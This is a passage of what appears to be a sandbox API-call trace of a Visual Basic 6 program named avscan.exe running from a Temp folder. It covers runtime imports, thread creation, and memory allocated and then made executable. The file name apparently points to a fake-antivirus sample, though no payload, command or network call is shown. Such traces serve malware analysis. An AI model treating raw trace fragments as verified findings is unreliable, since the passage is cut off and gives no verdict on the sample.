DestinationString="__vbaVarCmpNe") [0133.357] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarCmpNe", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a49957) returned 0x0 [0133.357] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaSetSystemError" | out: DestinationString="__vbaSetSystemError") [0133.357] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaSetSystemError", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0c33a) returned 0x0 [0133.358] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaHresultCheckObj" | out: DestinationString="__vbaHresultCheckObj") [0133.358] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaHresultCheckObj", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1a274) returned 0x0 [0133.359] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m32" | out: DestinationString="_adj_fdiv_m32") [0133.359] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m32", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a3026e) returned 0x0 [0133.360] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarForInit" | out: DestinationString="__vbaVarForInit") [0133.360] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarForInit", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a493cc) returned 0x0 [0133.360] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x252, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1cd3a) returned 0x0 [0133.361] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaOnError" | out: DestinationString="__vbaOnError") [0133.361] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaOnError", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a2499d) returned 0x0 [0133.362] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaObjSet" | out: DestinationString="__vbaObjSet") [0133.362] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaObjSet", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a19ff1) returned 0x0 [0133.363] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m16i" | out: DestinationString="_adj_fdiv_m16i") [0133.363] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m16i", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30306) returned 0x0 [0133.363] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaObjSetAddref" | out: DestinationString="__vbaObjSetAddref") [0133.364] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaObjSetAddref", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1a008) returned 0x0 [0133.366] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdivr_m16i" | out: DestinationString="_adj_fdivr_m16i") [0133.367] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdivr_m16i", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30406) returned 0x0 [0133.367] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x256, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0e0f7) returned 0x0 [0133.368] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x208, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a27621) returned 0x0 [0133.368] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVargVar" | out: DestinationString="__vbaVargVar") [0133.369] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVargVar", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a472be) returned 0x0 [0133.369] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaBoolVarNull" | out: DestinationString="__vbaBoolVarNull") [0133.369] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaBoolVarNull", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a47185) returned 0x0 [0133.370] RtlInitString (in: DestinationString=0x28fda8, SourceString="_CIsin" | out: DestinationString="_CIsin") [0133.370] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_CIsin", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a394ee) returned 0x0 [0133.371] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x20d, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a27db9) returned 0x0 [0133.371] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarZero" | out: DestinationString="__vbaVarZero") [0133.371] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarZero", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a46ea2) returned 0x0 [0133.372] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x278, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a2702f) returned 0x0 [0133.372] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaChkstk" | out: DestinationString="__vbaChkstk") [0133.373] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaChkstk", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a362ea) returned 0x0 [0133.510] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x28fe68 | out: lpflOldProtect=0x28fe68*=0x2) returned 1 [0133.510] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x28fe6c | out: lpflOldProtect=0x28fe6c*=0x4) returned 1 [0133.510] GetLastError () returned 0x0 [0133.510] SetLastError (dwErrCode=0x0) [0133.510] GetLastError () returned 0x0 [0133.511] SetLastError (dwErrCode=0x0) [0133.511] GetLastError () returned 0x0 [0133.511] SetLastError (dwErrCode=0x0) [0133.625] GetLastError () returned 0x0 [0133.626] SetLastError (dwErrCode=0x0) [0133.626] GetLastError () returned 0x0 [0133.626] SetLastError (dwErrCode=0x0) [0133.626] GetLastError () returned 0x0 [0133.626] SetLastError (dwErrCode=0x0) [0133.743] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4310c4, lpParameter=0x3330834, dwCreationFlags=0x4, lpThreadId=0x337800c | out: lpThreadId=0x337800c*=0xff0) returned 0x124 [0133.744] GetLocalTime (in: lpSystemTime=0x28fe44 | out: lpSystemTime=0x28fe44*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x19f)) [0133.744] ResumeThread (hThread=0x124) returned 0x1 [0133.744] SetTimer (hWnd=0x0, nIDEvent=0x1, uElapse=0xcee, lpTimerFunc=0x53a7d8) returned 0x7fc4 [0133.744] GetLastError () returned 0x0 [0133.745] SetLastError (dwErrCode=0x0) [0133.745] GetLastError () returned 0x0 [0133.745] SetLastError (dwErrCode=0x0) [0133.745] GetLastError () returned 0x0 [0133.745] SetLastError (dwErrCode=0x0) [0133.745] GetLastError () returned 0x0 [0133.745] SetLastError (dwErrCode=0x0) [0133.819] GetLastError () returned 0x0 [0133.819] SetLastError (dwErrCode=0x0) [0133.819] GetLastError () returned 0x0 [0133.819] SetLastError (dwErrCode=0x0) [0133.819] GetLastError () returned 0x0 [0133.820] SetLastError (dwErrCode=0x0) [0133.820] GetLastError () returned 0x0 [0133.820] SetLastError (dwErrCode=0x0) [0133.820] GetLastError () returned 0x0 [0133.820] SetLastError (dwErrCode=0x0) [0133.820] GetLastError () returned 0x0 [0133.820] SetLastError (dwErrCode=0x0) [0133.871] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x26000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0133.871] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0133.872] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0133.872] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0133.872] GetLastError () returned 0x0 [0133.872] SetLastError (dwErrCode=0x0) [0133.872] GetLastError () returned 0x0 [0133.872] SetLastError (dwErrCode=0x0) [0133.872] GetLastError () returned 0x0 [0133.872] SetLastError (dwErrCode=0x0) [0133.930] GetLastError () returned 0x0 [0133.930] SetLastError (dwErrCode=0x0) [0133.930] GetLastError () returned 0x0 [0133.931] SetLastError (dwErrCode=0x0) [0133.931] GetLastError () returned 0x0 [0133.931] SetLastError (dwErrCode=0x0) [0134.024] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x26000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0134.024] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0134.024] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0134.024] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0134.024] GetLastError () returned 0x0 [0134.025] SetLastError (dwErrCode=0x0) [0134.025] GetLastError () returned 0x0 [0134.025] SetLastError (dwErrCode=0x0) [0134.025] GetLastError () returned 0x0 [0134.025] SetLastError (dwErrCode=0x0) [0134.025] GetLastError () returned 0x0 [0134.025] SetLastError (dwErrCode=0x0) [0134.090] GetLastError () returned 0x0 [0134.090] SetLastError (dwErrCode=0x0) [0134.090] GetLastError () returned 0x0 [0134.090] SetLastError (dwErrCode=0x0) [0134.090] GetLastError () returned 0x0 [0134.091] SetLastError (dwErrCode=0x0) [0134.250] GetLastError () returned 0x0 [0134.250] SetLastError (dwErrCode=0x0) [0134.250] GetLastError () returned 0x0 [0134.250] SetLastError (dwErrCode=0x0) [0134.250] GetLastError () returned 0x0 [0134.250] SetLastError (dwErrCode=0x0) [0134.370] GetLastError () returned 0x0 [0134.370] SetLastError (dwErrCode=0x0) [0134.520] GetStartupInfoA (in: lpStartupInfo=0x28feb0 | out: lpStartupInfo=0x28feb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0134.520] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x104) returned 0x10d07d0 [0134.520] GetCurrentThreadId () returned 0xfd8 [0134.520] GetCurrentThreadId () returned 0xfd8 [0134.520] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xec8) returned 0x10d08e0 [0134.724] lstrlenA (lpString="") returned 0 [0134.724] lstrcpyA (in: lpString1=0x28fe3c, lpString2="" | out: lpString1="") returned="" [0134.724] SetErrorMode (uMode=0x8001) returned 0x8001 [0134.724] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x28faf8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0134.724] GetUserDefaultLCID () returned 0x409 [0134.724] lstrcpyA (in: lpString1=0x28f7f8, lpString2="*" | out: lpString1="*") returned="*" [0134.724] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x28fbfc, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0134.725] GetSystemDefaultLCID () returned 0x409 [0134.725] GetUserDefaultLCID () returned 0x409 [0134.725] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x28fc06, cchData=2 | out: lpLCData=".") returned 2 [0134.725] GetStockObject (i=13) returned 0x18a002e [0134.725] GetObjectA (in: h=0x18a002e, c=60, pv=0x28fbcc | out: pv=0x28fbcc) returned 60 [0134.725] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x28fbc8, cchData=4 | out: lpLCData="ENU") returned 4 [0134.725] lstrcpyA (in: lpString1=0x28fbf8, lpString2="EN" | out: lpString1="EN") returned="EN" [0134.725] lstrlenA (lpString="{xx}") returned 4 [0134.725] lstrlenA (lpString="VB98.CHM") returned 8 [0134.725] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0134.725] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x28fbc8, cchData=4 | out: lpLCData="ENU") returned 4 [0134.725] lstrcpyA (in: lpString1=0x28fbf8, lpString2="EN" | out: lpString1="EN") returned="EN" [0134.725] lstrlenA (lpString="{xx}") returned 4 [0134.725] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0134.725] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0134.726] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28fd20, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0134.726] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x28fc1c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0134.726] lstrcpynA (in: lpString1=0x28fb00, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0134.726] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0134.726] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x21) returned 0x10d17b0 [0134.726] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x21) returned 0x10d17e0 [0134.726] lstrcpyA (in: lpString1=0x10d17b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0134.726] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchSrc=-1, lpDestStr=0x28fae0, cchDest=260 | out: lpDestStr="C:\\USERS\\KEECFM~1\\APPDATA\\LOCAL\\TEMP\\AVSCAN.EXE") returned 48 [0134.729] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x28fbe4, dwRevision=0x1 | out: pSecurityDescriptor=0x28fbe4) returned 1 [0134.729] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x28fbe4, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x28fbe4) returned 1 [0134.729] CreateSemaphoreA (lpSemaphoreAttributes=0x28fbf8, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?KEECFM~1?APPDATA?LOCAL?TEMP?AVSCAN.EXE") returned 0x11c [0134.827] GetLastError () returned 0x0 [0134.827] GetVersionExA (in: lpVersionInformation=0x28fb5c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28fb5c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0134.828] OleInitialize (pvReserved=0x0) returned 0x0 [0134.831] OaBuildVersion () returned 0x321396 [0134.961] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="OLEAUT32.DLL", cbMultiByte=12, lpWideCharStr=0x28eb84, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.DLL") returned 12 [0134.961] SysReAllocStringLen (in: pbstr=0x28fb88*=0x0, psz="OLEAUT32.DLL", len=0xc | out: pbstr=0x28fb88*="OLEAUT32.DLL") returned 1 [0134.961] CharLowerBuffW (in: lpsz="OLEAUT32.DLL", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0134.961] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x775d0000 [0134.962] GetLastError () returned 0x0 [0134.962] SetLastError (dwErrCode=0x0) [0134.962] GetLastError () returned 0x0 [0134.962] GetProcAddress (hModule=0x775d0000, lpProcName="OleLoadPictureEx") returned 0x776370a1 [0134.963] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc079 [0134.963] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b4 [0134.963] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x28fbc4 | out: lpWndClass=0x28fbc4) returned 0 [0134.963] RegisterClassA (lpWndClass=0x28fbc4) returned 0x4ac1bf [0134.963] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x28fbc4 | out: lpWndClass=0x28fbc4) returned 0 [0134.964] RegisterClassA (lpWndClass=0x28fbc4) returned 0x4ac1c0 [0134.964] HeapCreate (flOptions=0x0, dwInitialSize=0x400, dwMaximumSize=0x0) returned 0x3b10000 [0134.965] GetUserDefaultLCID () returned 0x409 [0134.965] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x3a4) returned 0x10d1810 [0134.965] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x3a4) returned 0x10d1bc0 [0134.965] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0xd4) returned 0x10d1f70 [0134.965] GetSystemInfo (in: lpSystemInfo=0x28fb84 | out: lpSystemInfo=0x28fb84*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06)) [0134.966] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x3a0000 [0134.966] VirtualAlloc (lpAddress=0x3a0000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0134.966] VirtualAlloc (lpAddress=0x3a0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0134.967] VirtualAlloc (lpAddress=0x3a0000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0134.967] VirtualAlloc (lpAddress=0x3a0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0134.968] VirtualAlloc (lpAddress=0x3a0000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0134.968] VirtualAlloc (lpAddress=0x3a0000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0134.969] VirtualProtect (in: lpAddress=0x3a0000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x28fbe0 | out: lpflOldProtect=0x28fbe0*=0x4) returned 1 [0134.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3a0000, dwSize=0x6000) returned 1 [0134.971] GlobalAddAtomA (lpString="VBDisabled") returned 0xc164 [0134.972] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="oleaut32.dll", cbMultiByte=12, lpWideCharStr=0x28eb40, cchWideChar=2047 | out: lpWideCharStr="oleaut32.dll\x18") returned 12 [0134.972] SysReAllocStringLen (in: pbstr=0x28fb44*=0x0, psz="oleaut32.dll", len=0xc | out: pbstr=0x28fb44*="oleaut32.dll") returned 1 [0134.972] CharLowerBuffW (in: lpsz="oleaut32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0134.973] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x775d0000 [0134.973] GetProcAddress (hModule=0x775d0000, lpProcName="DispCallFunc") returned 0x775e3dcf [0134.974] GetProcAddress (hModule=0x775d0000, lpProcName="LoadTypeLibEx") returned 0x775e07b7 [0134.974] GetProcAddress (hModule=0x775d0000, lpProcName="UnRegisterTypeLib") returned 0x77601ca9 [0134.974] GetProcAddress (hModule=0x775d0000, lpProcName="CreateTypeLib2") returned 0x775e8e70 [0134.975] GetProcAddress (hModule=0x775d0000, lpProcName="VarDateFromUdate") returned 0x775e7684 [0134.975] GetProcAddress (hModule=0x775d0000, lpProcName="VarUdateFromDate") returned 0x775ecc98 [0134.975] GetProcAddress (hModule=0x775d0000, lpProcName="GetAltMonthNames") returned 0x7761903a [0134.976] GetProcAddress (hModule=0x775d0000, lpProcName="VarNumFromParseNum") returned 0x775e6231 [0134.976] GetProcAddress (hModule=0x775d0000, lpProcName="VarParseNumFromStr") returned 0x775e5fea [0134.976] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromR4") returned 0x775f3f94 [0134.976] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromR8") returned 0x775f4e9e [0134.977] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromDate") returned 0x7761db72 [0134.977] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromI4") returned 0x77602a8c [0134.977] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromCy") returned 0x7761d737 [0134.977] GetProcAddress (hModule=0x775d0000, lpProcName="VarR4FromDec") returned 0x7761e015 [0134.978] GetProcAddress (hModule=0x775d0000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7761cc3d [0134.978] GetProcAddress (hModule=0x775d0000, lpProcName="GetRecordInfoFromGuids") returned 0x7761d1c4 [0134.978] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayGetRecordInfo") returned 0x7761d48c [0134.978] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArraySetRecordInfo") returned 0x7761d4c6 [0134.979] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayGetIID") returned 0x7761d509 [0134.979] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArraySetIID") returned 0x775ee7bb [0134.979] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayCopyData") returned 0x775ee496 [0134.979] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x775eddf1 [0134.980] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayCreateEx") returned 0x7761d53f [0134.980] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormat") returned 0x77622055 [0134.980] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatDateTime") returned 0x776220ea [0134.981] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatNumber") returned 0x77622151 [0134.981] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatPercent") returned 0x776221f5 [0134.981] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatCurrency") returned 0x77622288 [0134.981] GetProcAddress (hModule=0x775d0000, lpProcName="VarWeekdayName") returned 0x77622335 [0134.982] GetProcAddress (hModule=0x775d0000, lpProcName="VarMonthName") returned 0x776223d5 [0134.982] GetProcAddress (hModule=0x775d0000, lpProcName="VarAdd") returned 0x775f5934 [0134.982] GetProcAddress (hModule=0x775d0000, lpProcName="VarAnd") returned 0x775f5a98 [0134.982] GetProcAddress (hModule=0x775d0000, lpProcName="VarCat") returned 0x775f59b4 [0134.983] GetProcAddress (hModule=0x775d0000, lpProcName="VarDiv") returned 0x7764e405 [0134.983] GetProcAddress (hModule=0x775d0000, lpProcName="VarEqv") returned 0x7764ef07 [0134.983] GetProcAddress (hModule=0x775d0000, lpProcName="VarIdiv") returned 0x7764f00a [0134.983] GetProcAddress (hModule=0x775d0000, lpProcName="VarImp") returned 0x7764ef47 [0134.984] GetProcAddress (hModule=0x775d0000, lpProcName="VarMod") returned 0x7764f15e [0134.984] GetProcAddress (hModule=0x775d0000, lpProcName="VarMul") returned 0x7764dbd4 [0134.984] GetProcAddress (hModule=0x775d0000, lpProcName="VarOr") returned 0x7764ecfa [0134.985] GetProcAddress (hModule=0x775d0000, lpProcName="VarPow") returned 0x7764ea66 [0134.985] GetProcAddress (hModule=0x775d0000, lpProcName="VarSub") returned 0x7764d332 [0134.985] GetProcAddress (hModule=0x775d0000, lpProcName="VarXor") returned 0x7764ee2e [0134.985] GetProcAddress (hModule=0x775d0000, lpProcName="VarAbs") returned 0x7764ca11 [0134.986] GetProcAddress (hModule=0x775d0000, lpProcName="VarFix") returned 0x7764cc5f [0134.986] GetProcAddress (hModule=0x775d0000, lpProcName="VarInt") returned 0x7764cde7 [0134.986] GetProcAddress (hModule=0x775d0000, lpProcName="VarNeg") returned 0x7764c802 [0134.986] GetProcAddress (hModule=0x775d0000, lpProcName="VarNot") returned 0x7764ec66 [0134.987] GetProcAddress (hModule=0x775d0000, lpProcName="VarRound") returned 0x7764d155 [0134.990] GetProcAddress (hModule=0x775d0000, lpProcName="VarCmp") returned 0x775eb0dc [0134.990] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecAdd") returned 0x77605f3e [0134.990] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecCmp") returned 0x775f4fd0 [0134.991] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrCat") returned 0x775f0d2c [0134.991] GetProcAddress (hModule=0x775d0000, lpProcName="VarCyMulI4") returned 0x776059ed [0134.991] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrCmp") returned 0x775df8b8 [0134.991] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ole32.dll", cbMultiByte=9, lpWideCharStr=0x28eb4c, cchWideChar=2047 | out: lpWideCharStr="ole32.dll(\x0c") returned 9 [0134.992] SysReAllocStringLen (in: pbstr=0x28fb50*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x28fb50*="ole32.dll") returned 1 [0134.992] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0134.992] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76c60000 [0134.993] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstanceEx") returned 0x76ca9d4e [0134.993] GetProcAddress (hModule=0x76c60000, lpProcName="CLSIDFromProgIDEx") returned 0x76c70782 [0134.993] GetSystemMetrics (nIndex=42) returned 0 [0134.993] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x76da66bc) returned 0x0 [0134.993] IMalloc:Alloc (This=0x76da66bc, cb=0x4) returned 0x114b370 [0134.994] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f8f8, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0134.994] lstrcatA (in: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpString2=".cfg" | 